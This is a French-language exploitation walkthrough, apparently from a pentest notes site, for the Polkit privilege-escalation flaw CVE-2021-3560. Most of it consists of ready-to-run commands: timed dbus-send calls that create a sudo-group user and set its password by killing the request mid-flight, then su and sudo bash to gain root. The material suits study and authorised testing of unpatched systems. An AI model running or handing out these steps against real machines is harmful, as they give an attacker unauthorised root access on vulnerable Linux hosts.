CVE 2021-3560 (Polkit)

Polkit est un processus d'arrière-plan qui permet l'autorisation mais il a une invite graphique avec laquelle les utilisateurs d'Ubuntu doivent être familiers.

Cependant, polkit est également exécuté en mode texte lors de l'utilisation d'une session en mode texte, par exemple lors de l'utilisation de ssh.

$ pkexec sh

Exploitation

Pour que l'exploit fonctionne, nous devons tuer la commande pendant son exécution. Pour cela, nous devons vérifier le temps nécessaire à l'exécution de cette commande.

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:<username> string:"user" int32:1

Disons par exemple que la commande mette 0,008 seconde pour s'exécuter.

On va donc faire en sorte de kill le processus avant la fin de son exécution comme ceci:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:<username> string:"user" int32:1 & sleep 0.0035s; kill $!

L'exploit fonctionne rarement du premier coups il arrive de devoir relancer 5, 6, 7 fois la commande pour que le nouvel utilisateur soit créé.

Comment l'exploit fonctionne-t-il ? Dbus attribue un identifiant unique à toute connexion. Polkit vérifie cet identifiant unique et fournit une autorisation. Disons que l'UID est de 1,87. Depuis, la connexion s'interrompt, polkit reconnaît l'UID comme 0 et considère la demande provenant de la racine. C'est ainsi que fonctionne l'exploit.

Ensuite, nous devons fournir le mot de passe à l'aide de dbus afin que nous puissions utiliser cet utilisateur nouvellement créé. Nous devons générer un mot de passe hashé car dbus-send prend le mot de passe hashé en entrée.

$ openssl passwd -5 <username>@<password>

Nous devons maintenant passer ce hachage dans la fonction User.SetPassword en utilisant dbus sous un paramètre de chaîne. La charge utile ressemble à :

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User<uid> org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!

Nous devons envoyer cette commande 6 à 7 fois pour que cela fonctionne. Nous pouvons maintenant nous connecter à cet utilisateur.

su <username>
password: <username>@<password>

Vous pouvez enfin élever vos privilèges en utilisant la commande sudo bash car l'utilisateur créé est membre du groupe sudo.

Dernière mise à jour